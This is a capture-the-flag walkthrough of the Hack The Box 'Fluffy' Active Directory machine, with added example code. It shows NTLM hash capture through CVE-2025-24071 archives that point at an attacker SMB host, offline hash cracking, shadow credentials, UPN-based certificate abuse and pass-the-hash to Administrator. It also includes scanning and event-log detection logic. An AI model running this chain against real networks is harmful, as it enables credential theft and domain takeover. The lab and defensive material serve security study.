Fluffy
https://app.hackthebox.com/machines/662

Machine Information
As is common in real life Windows pentests, you will start the Fluffy box with credentials for the following account: j.fleischman / J0elTHEM4n1990!
Recon
[*] Running initial Nmap scan...
sudo nmap -sCV -T4 <ip> -oA nmap-initial
Starting Nmap 7.95 ( https://nmap.org ) at 2025-05-24 21:02 CEST
Nmap scan report for fluffy.htb
Host is up (0.024s latency).
Not shown: 989 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec?
139/tcp open netbios-ssn?
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-25T02:04:07+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
|_ssl-date: 2025-05-25T02:04:07+00:00; +7h00m01s from scanner time.
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-25T02:04:07+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
3269/tcp open ssl/ldap Microsoft Windows Active Directory LDAP (Domain: fluffy.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-05-25T02:04:07+00:00; +7h00m01s from scanner time.
| ssl-cert: Subject: commonName=DC01.fluffy.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.fluffy.htb
| Not valid before: 2025-04-17T16:04:17
|_Not valid after: 2026-04-17T16:04:17
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port139-TCP:V=7.95%I=7%D=5/24%Time=683217CE%P=x86_64-pc-linux-gnu%r(Get
SF:Request,5,"\x83\0\0\x01\x8f");
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Validating the starting credentials over SMB with CrackMapExec:
$ crackmapexec smb <ip> -u j.fleischman -p J0elTHEM4n1990!
SMB 10.129.241.133 445 DC01 [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:fluffy.htb) (signing:True) (SMBv1:False)
SMB 10.129.241.133 445 DC01 [+] fluffy.htb\j.fleischman:J0elTHEM4n1990!
The account can list the shares. Besides the defaults there is a non-standard IT share, which is the one worth looking at:
$ smbclient -L //<ip> -U j.fleischman
Password for [WORKGROUP\j.fleischman]:
Sharename Type Comment
--------- ---- -------
ADMIN$ Disk Remote Admin
C$ Disk Default share
IPC$ IPC Remote IPC
IT Disk
NETLOGON Disk Logon server share
SYSVOL Disk Logon server share
$ smbclient //<ip>/IT -U j.fleischman
Password for [WORKGROUP\j.fleischman]:
Try "help" to get a list of possible commands.
smb: \> dir
. D 0 Mon May 19 16:27:02 2025
.. D 0 Mon May 19 16:27:02 2025
Everything-1.4.1.1026.x64 D 0 Fri Apr 18 17:08:44 2025
Everything-1.4.1.1026.x64.zip A 1827464 Fri Apr 18 17:04:05 2025
KeePass-2.58 D 0 Fri Apr 18 17:08:38 2025
KeePass-2.58.zip A 3225346 Fri Apr 18 17:03:17 2025
Upgrade_Notice.pdf A 169963 Sat May 17 16:31:07 2025
5842943 blocks of size 4096. 2076907 blocks available
smb: \> get Upgrade_Notice.pdf
getting file \Upgrade_Notice.pdf of size 169963 as Upgrade_Notice.pdf (976.3 KiloBytes/sec) (average 976.3 KiloBytes/sec)
smb: \>

User/Root
Checking the vulnerabilities referenced in the upgrade notice, CVE-2025-24071 (Windows File Explorer spoofing through .library-ms files inside an archive) gives us a way to capture a NetNTLMv2 hash: when the archive we drop into the IT share is extracted on the other side, Explorer parses the .library-ms file and authenticates to the SMB server it points at, which is ours. Using the public PoC to build the archive, then standing up an SMB listener before uploading it:
git clone https://github.com/ThemeHackers/CVE-2025-24071
cd CVE-2025-24071
python3 -m venv venv
source ./venv/bin/activate
pip install -r requirements.txt
python3 exploit.py -i <vpn> -f exploit
sudo impacket-smbserver share ./share -smb2support
smbclient //<ip>/IT -U j.fleischman%J0elTHEM4n1990! -c "put exploit.zip"
[..]
[*] User DC01\p.agila authenticated successfully
[*] p.agila::FLUFFY:aaaaaaaaaaaaaaaa:b62164f35a2f4a2b539ccfa42c91ec10:01010000000000008025f54461cddb01980ee0b30b898d7b000000000100100078006c0068004a005800620048006a000300100078006c0068004a005800620048006a000200100066006a0054006e0050004600730079000400100066006a0054006e005000460073007900070008008025f54461cddb01060004000200000008003000300000000000000001000000002000002daa84cffbaad1b43bd444a221def221fe09249d506c65fb13db8370004e60d70a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00360031000000000000000000
[..]
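To make the capture less of a black box, here is an added example (not from the writeup or the PoC repository) that builds an archive of the shape CVE-2025-24071 relies on, a .library-ms Library Description file whose search location is a UNC path, and then scans archives for that indicator. The attacker host 10.10.14.61, the entry names and the decoy content are constructed; the XML namespace is the one Windows Library Description files use.

```python
# Added example (not from the writeup or the PoC): the payload shape CVE-2025-24071
# relies on, and a scanner for it. A .library-ms file is a Windows Library
# Description XML; when it is extracted from an archive Explorer parses it and
# connects to the location it names, so a UNC path there leaks NetNTLMv2.
# The attacker host, entry names and file contents below are constructed.
import io
import re
import xml.etree.ElementTree as ET
import zipfile

LIBRARY_NS = "http://schemas.microsoft.com/windows/2009/library"
# \\host\share..., file://host/share..., or smb://...; a bare file:///C:/... is local.
REMOTE_RE = re.compile(r"^(\\\\[^\\]+\\|file://[^/]+/|smb://)", re.I)


def build_library_ms(location: str) -> bytes:
    """Minimal libraryDescription with a single search location (constructed)."""
    xml = (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        f'<libraryDescription xmlns="{LIBRARY_NS}">\n'
        "  <searchConnectorDescriptionList>\n"
        "    <searchConnectorDescription>\n"
        f"      <simpleLocation><url>{location}</url></simpleLocation>\n"
        "    </searchConnectorDescription>\n"
        "  </searchConnectorDescriptionList>\n"
        "</libraryDescription>\n"
    )
    return xml.encode("utf-8")


def build_archive(location: str, entry_name: str = "exploit.library-ms") -> bytes:
    """ZIP with one library file plus a benign decoy, built in memory."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr(entry_name, build_library_ms(location))
        zf.writestr("README.txt", "constructed decoy content\n")
    return buf.getvalue()


def is_remote_location(url: str) -> bool:
    return bool(REMOTE_RE.match(url.strip()))


def scan_archive(zip_bytes: bytes) -> list:
    """Return one finding per .library-ms entry that points at a remote location."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for info in zf.infolist():
            if not info.filename.lower().endswith(".library-ms"):
                continue
            try:
                root = ET.fromstring(zf.read(info))
            except ET.ParseError:
                findings.append({"entry": info.filename, "url": None,
                                 "reason": "unparseable library file"})
                continue
            for url in root.iter(f"{{{LIBRARY_NS}}}url"):
                if url.text and is_remote_location(url.text):
                    findings.append({"entry": info.filename, "url": url.text.strip(),
                                     "reason": "library file points at a remote location"})
    return findings


if __name__ == "__main__":
    for finding in scan_archive(build_archive(r"\\10.10.14.61\share")):
        print(finding)
```

Run against files landing on a writable share (or on a mail gateway) this flags exactly the file that the PoC produces, while a library file that only points at a local folder passes.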
Identifying and cracking the hash with hashcat (mode 5600, NetNTLMv2) against rockyou:
$ cat hash
p.agila::FLUFFY:aaaaaaaaaaaaaaaa:b62164f35a2f4a2b539ccfa42c91ec10:01010000000000008025f54461cddb01980ee0b30b898d7b000000000100100078006c0068004a005800620048006a000300100078006c0068004a005800620048006a000200100066006a0054006e0050004600730079000400100066006a0054006e005000460073007900070008008025f54461cddb01060004000200000008003000300000000000000001000000002000002daa84cffbaad1b43bd444a221def221fe09249d506c65fb13db8370004e60d70a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00360031000000000000000000
$ hashcat --identify hash
The following hash-mode match the structure of your input hash:
# | Name | Category
======+============================================================+======================================
5600 | NetNTLMv2 | Network Protocol
$ hashcat -m 5600 -a 0 hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
[..]
P.AGILA::FLUFFY:aaaaaaaaaaaaaaaa:b62164f35a2f4a2b539ccfa42c91ec10:01010000000000008025f54461cddb01980ee0b30b898d7b000000000100100078006c0068004a005800620048006a000300100078006c0068004a005800620048006a000200100066006a0054006e0050004600730079000400100066006a0054006e005000460073007900070008008025f54461cddb01060004000200000008003000300000000000000001000000002000002daa84cffbaad1b43bd444a221def221fe09249d506c65fb13db8370004e60d70a001000000000000000000000000000000000000900200063006900660073002f00310030002e00310030002e00310034002e00360031000000000000000000:prometheusx-303
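What hashcat does in mode 5600 is cheap to reproduce, and doing so shows why a NetNTLMv2 capture is crackable offline: the response is HMAC-MD5 over the server challenge and the client blob, keyed with an HMAC of the NT hash, so every candidate password costs one MD4 and two HMAC-MD5s. The following is an added example, not from the writeup; the capture line it works on is constructed from a made-up password (the real p.agila hash above is not used), and MD4 is implemented inline because hashlib's md4 is frequently disabled under OpenSSL 3.

```python
# Added example (not from the writeup): what hashcat -m 5600 actually computes.
# The capture line below is CONSTRUCTED with a known password; it is not the
# real p.agila hash from the page.
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF


def _rotl(x, n):
    return ((x << n) | (x >> (32 - n))) & MASK


def md4(data: bytes) -> bytes:
    """Pure-Python MD4 (RFC 1320); hashlib's md4 is often unavailable under OpenSSL 3."""
    msg = data + b"\x80"
    msg += b"\x00" * ((56 - len(msg) % 64) % 64)
    msg += struct.pack("<Q", len(data) * 8)
    h = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    k = lambda x, y, z: x ^ y ^ z
    rounds = (
        (f, range(16), (3, 7, 11, 19), 0),
        (g, (0, 4, 8, 12, 1, 5, 9, 13, 2, 6, 10, 14, 3, 7, 11, 15), (3, 5, 9, 13), 0x5A827999),
        (k, (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15), (3, 9, 11, 15), 0x6ED9EBA1),
    )
    for off in range(0, len(msg), 64):
        x = struct.unpack("<16I", msg[off:off + 64])
        s = h[:]
        for fn, order, shifts, const in rounds:
            for i, idx in enumerate(order):
                s[0] = _rotl((s[0] + fn(s[1], s[2], s[3]) + x[idx] + const) & MASK, shifts[i % 4])
                s = [s[3], s[0], s[1], s[2]]  # rotate so the next step updates the next word
        h = [(a + b) & MASK for a, b in zip(h, s)]
    return struct.pack("<4I", *h)


def nt_hash(password: str) -> bytes:
    """NT hash = MD4(UTF-16LE(password))."""
    return md4(password.encode("utf-16-le"))


def ntowf_v2(password: str, user: str, domain: str) -> bytes:
    """NTLMv2 hash: HMAC-MD5 keyed with the NT hash over UPPER(user) + domain in UTF-16LE."""
    return hmac.new(nt_hash(password), (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def nt_proof(password: str, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr: HMAC-MD5 over server challenge + client blob, keyed with the NTLMv2 hash."""
    return hmac.new(ntowf_v2(password, user, domain), server_challenge + blob, hashlib.md5).digest()


def parse_5600(line: str):
    """hashcat 5600 line: user::domain:server_challenge:NTProofStr:blob (hex fields)."""
    user, _, domain, chall, proof, blob = line.strip().split(":")
    return user, domain, bytes.fromhex(chall), bytes.fromhex(proof), bytes.fromhex(blob)


def make_5600(user: str, domain: str, password: str, server_challenge: bytes, blob: bytes) -> str:
    proof = nt_proof(password, user, domain, server_challenge, blob)
    return f"{user}::{domain}:{server_challenge.hex()}:{proof.hex()}:{blob.hex()}"


def crack_5600(line: str, wordlist):
    """Return the first candidate whose recomputed NTProofStr matches the capture, else None."""
    user, domain, chall, proof, blob = parse_5600(line)
    for cand in wordlist:
        if hmac.compare_digest(nt_proof(cand, user, domain, chall, blob), proof):
            return cand
    return None


# Constructed capture: the fixed challenge a rogue SMB server hands out, a minimal
# NTLMv2_CLIENT_CHALLENGE blob (type, reserved, timestamp, client nonce, padding) and
# a made-up password.
SAMPLE_PASSWORD = "Spring2025!"
SAMPLE_LINE = make_5600(
    "p.agila", "FLUFFY", SAMPLE_PASSWORD,
    bytes.fromhex("aaaaaaaaaaaaaaaa"),
    bytes.fromhex("0101000000000000") + b"\x00" * 8 + bytes.fromhex("0011223344556677") + b"\x00" * 4,
)

if __name__ == "__main__":
    print(SAMPLE_LINE)
    print("cracked:", crack_5600(SAMPLE_LINE, ["123456", "Summer2024", SAMPLE_PASSWORD]))
```

The fixed challenge aaaaaaaaaaaaaaaa in the real capture is the listener's doing, not the client's, and is what makes precomputation against a known challenge possible; the actual strength of the capture rests entirely on the password.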
Enumerating the domain with BloodHound as p.agila. First a hosts entry for the DC, and a minimal /etc/krb5.conf for the FLUFFY.HTB realm so Kerberos-aware tooling knows where the KDC is:
echo '<ip> fluffy.htb DC01.FLUFFY.HTB' | sudo tee -a /etc/hosts
[libdefaults]
default_realm = FLUFFY.HTB
dns_lookup_realm = false
dns_lookup_kdc = false
ticket_lifetime = 24h
forwardable = true
renewable = true
[realms]
FLUFFY.HTB = {
kdc = <ip>
admin_server = <ip>
}
[domain_realm]
.fluffy.htb = FLUFFY.HTB
fluffy.htb = FLUFFY.HTB
$ bloodhound-python -u 'p.agila' -p 'prometheusx-303' -d fluffy.htb -dc DC01.FLUFFY.HTB -c All -o bloodhound_results.json -ns <ip>
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: fluffy.htb
INFO: Getting TGT for user
WARNING: Failed to get Kerberos TGT. Falling back to NTLM authentication. Error: Kerberos SessionError: KRB_AP_ERR_SKEW(Clock skew too great)
INFO: Connecting to LDAP server: DC01.FLUFFY.HTB
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 1 computers
INFO: Connecting to LDAP server: DC01.FLUFFY.HTB
INFO: Found 10 users
INFO: Found 54 groups
INFO: Found 2 gpos
INFO: Found 1 ous
INFO: Found 19 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: DC01.fluffy.htb
INFO: Done in 00M 07S

BloodHound shows the path: p.agila can add members to the Service Accounts group, and Service Accounts has GenericWrite over the ca_svc account. That gives an ADCS chain of shadow credentials followed by certificate abuse: join Service Accounts, take over ca_svc, then use ca_svc to obtain a certificate that authenticates as Administrator. Start by adding p.agila to Service Accounts:
$ bloodyAD --host <ip> -d fluffy.htb -u p.agila -p 'prometheusx-303' add groupMember 'Service Accounts' p.agila
[+] p.agila added to Service Accounts
With GenericWrite on ca_svc we add a KeyCredential to its msDS-KeyCredentialLink and authenticate as ca_svc with the matching certificate (shadow credentials); Certipy's shadow auto also recovers the NT hash and restores the original attribute afterwards. Kerberos rejects requests when the client clock is more than five minutes off the KDC, and this DC runs about seven hours ahead (see the nmap ssl-date skew and the KRB_AP_ERR_SKEW warning from BloodHound), so sync the clock to the DC first:
$ sudo ntpdate <ip>
[sudo] password for kali:
2025-05-25 21:00:47.346476 (+0200) +25299.397345 +/- 0.010498 10.129.164.175 s1 no-leap
CLOCK: time stepped by 25299.397345
$ certipy-ad shadow auto -username P.AGILA@fluffy.htb -password 'prometheusx-303' -account ca_svc
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID '5fb2d338-1c91-6577-edb2-8a070b776431'
[*] Adding Key Credential with device ID '5fb2d338-1c91-6577-edb2-8a070b776431' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID '5fb2d338-1c91-6577-edb2-8a070b776431' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Using principal: ca_svc@fluffy.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': ca0f4f9e9eb8a092addf53bb03fc98c8
Next, the certificate abuse. With ca_svc's NT hash we first read the account, then set its userPrincipalName to administrator and request a certificate from the standard User template. This is not ESC1: the User template does not let the enrollee supply the subject, the CA builds it from the account's AD attributes, which is exactly why the certificate comes back with UPN administrator. It is usable only because the CA issues certificates without the SID security extension (see "Certificate has no object SID" in the output below): lacking a SID, the DC maps the certificate to an account by UPN alone. This CA-side weakness is what newer Certipy releases (5.x) report as ESC16; ESC9 is the template-side variant. Afterwards the UPN is restored so ca_svc is left as found, and the certificate is used to authenticate as administrator and recover the NT hash.
$ export KRB5CCNAME=ca_svc.ccache
$ certipy-ad account -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip <ip> -user 'ca_svc' read
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Reading attributes for 'ca_svc':
cn : certificate authority service
distinguishedName : CN=certificate authority service,CN=Users,DC=fluffy,DC=htb
name : certificate authority service
objectSid : S-1-5-21-497550768-2797716248-2627064577-1103
sAMAccountName : ca_svc
servicePrincipalName : ADCS/ca.fluffy.htb
$ certipy-ad account -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip <ip> -upn 'administrator' -user 'ca_svc' update
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_svc':
userPrincipalName : administrator
[*] Successfully updated 'ca_svc'
$ sudo ntpdate <ip>
2025-05-25 21:15:58.555036 (+0200) +25299.412195 +/- 0.011312 10.129.164.175 s1 no-leap
CLOCK: time stepped by 25299.412195
$ certipy-ad req -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip <ip> -target 'DC01.fluffy.htb' -ca 'fluffy-DC01-CA' -template 'User'
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Requesting certificate via RPC
[*] Successfully requested certificate
[*] Request ID is 16
[*] Got certificate with UPN 'administrator'
[*] Certificate has no object SID
[*] Saved certificate and private key to 'administrator.pfx'
$ certipy-ad account -u 'ca_svc' -hashes ':ca0f4f9e9eb8a092addf53bb03fc98c8' -dc-ip <ip> -upn 'ca_svc@fluffy.htb' -user 'ca_svc' update
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Updating user 'ca_svc':
userPrincipalName : ca_svc@fluffy.htb
[*] Successfully updated 'ca_svc'
$ certipy-ad auth -pfx administrator.pfx -username 'administrator' -domain 'fluffy.htb' -dc-ip <ip>
Certipy v4.8.2 - by Oliver Lyak (ly4k)
[*] Using principal: administrator@fluffy.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'administrator.ccache'
[*] Trying to retrieve NT hash for 'administrator'
[*] Got hash for 'administrator@fluffy.htb': aad3b435b51404eeaad3b435b51404ee:8da83a3fa618b6e3a00e93f676c92a6e
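Both privilege-escalation steps above leave a footprint in Directory Service Changes auditing: the shadow credential is a write to msDS-KeyCredentialLink by a principal other than the account itself, and the certificate trick is a userPrincipalName write that names a different identity, followed minutes later by a write that puts it back. The following detection logic is an added example, not from the writeup, run over constructed Event ID 5136 records (field names as in the real event; %%14674 is the "value added" OperationType). The DN-to-account table stands in for a lookup against AD and is an assumption. It generalises beyond this box: any cross-principal key credential write and any UPN that stops matching its own account are flagged, whatever the names involved.

```python
# Added example (not from the writeup): detection for the two directory writes
# the attack makes above, run over CONSTRUCTED Event ID 5136 ("directory service
# object was modified") records. %%14674 is the OperationType for "value added".
# The DN-to-account table stands in for an LDAP lookup and is an assumption.
from datetime import datetime, timedelta

VALUE_ADDED = "%%14674"
CA_DN = "CN=certificate authority service,CN=Users,DC=fluffy,DC=htb"

DN_TO_SAM = {  # constructed; resolve ObjectDN/ObjectGUID against AD in practice
    CA_DN: "ca_svc",
    "CN=Service Accounts,CN=Users,DC=fluffy,DC=htb": None,  # a group, not a user
}

EVENTS = [  # constructed records, chronological
    {"time": "2025-05-25T19:01:10", "SubjectUserName": "p.agila",
     "ObjectDN": "CN=Service Accounts,CN=Users,DC=fluffy,DC=htb",
     "AttributeLDAPDisplayName": "member", "OperationType": VALUE_ADDED,
     "AttributeValue": "CN=p.agila,CN=Users,DC=fluffy,DC=htb"},
    {"time": "2025-05-25T19:02:30", "SubjectUserName": "p.agila", "ObjectDN": CA_DN,
     "AttributeLDAPDisplayName": "msDS-KeyCredentialLink", "OperationType": VALUE_ADDED,
     "AttributeValue": "<DN-Binary KeyCredentialLink blob>"},
    {"time": "2025-05-25T19:05:02", "SubjectUserName": "ca_svc", "ObjectDN": CA_DN,
     "AttributeLDAPDisplayName": "userPrincipalName", "OperationType": VALUE_ADDED,
     "AttributeValue": "administrator"},
    {"time": "2025-05-25T19:07:45", "SubjectUserName": "ca_svc", "ObjectDN": CA_DN,
     "AttributeLDAPDisplayName": "userPrincipalName", "OperationType": VALUE_ADDED,
     "AttributeValue": "ca_svc@fluffy.htb"},
]


def detect(events, dn_to_sam=DN_TO_SAM, revert_window=timedelta(minutes=30)):
    """Return (rule, actor, detail) tuples for shadow-credential and UPN tampering."""
    alerts = []
    last_upn = {}  # ObjectDN -> (time, value) of the previous UPN write
    for ev in events:
        if ev["OperationType"] != VALUE_ADDED:
            continue
        actor = ev["SubjectUserName"].lower()
        target = dn_to_sam.get(ev["ObjectDN"])
        attr = ev["AttributeLDAPDisplayName"]
        t = datetime.fromisoformat(ev["time"])
        if attr == "msDS-KeyCredentialLink" and target and actor != target.lower():
            # A principal writing a key credential onto someone else's account is the
            # shadow-credentials primitive. Self-writes (Windows Hello for Business,
            # device registration) are legitimate and filtered out here.
            alerts.append(("shadow_credential_written_by_other_principal", actor, target))
        elif attr == "userPrincipalName" and target:
            upn = ev["AttributeValue"]
            local = upn.split("@", 1)[0].lower()
            if local != target.lower():
                # The UPN now names a different identity (or lost its realm suffix):
                # the precondition for the UPN-mapping certificate abuse.
                alerts.append(("upn_points_at_other_identity", actor, f"{target} -> {upn}"))
            prev = last_upn.get(ev["ObjectDN"])
            if prev and t - prev[0] <= revert_window and local == target.lower():
                # Set-and-revert inside a short window: the attacker cleaning up.
                alerts.append(("upn_set_and_reverted", actor, f"{prev[1]} -> {upn}"))
            last_upn[ev["ObjectDN"]] = (t, upn)
    return alerts


if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(*alert)
```

Pair these with Event ID 4887 (certificate issued) on the CA and 4768 with certificate pre-authentication on the DC to see the requested certificate and the logon it produced; the UPN alerts alone are enough to catch the window in which the certificate was requested.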
$ evil-winrm -i <ip> -u administrator -H '8da83a3fa618b6e3a00e93f676c92a6e'
Evil-WinRM shell v3.7
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
The user flag is in the winrm_svc profile. It could have been collected earlier, by applying the same shadow-credential step to winrm_svc instead of ca_svc.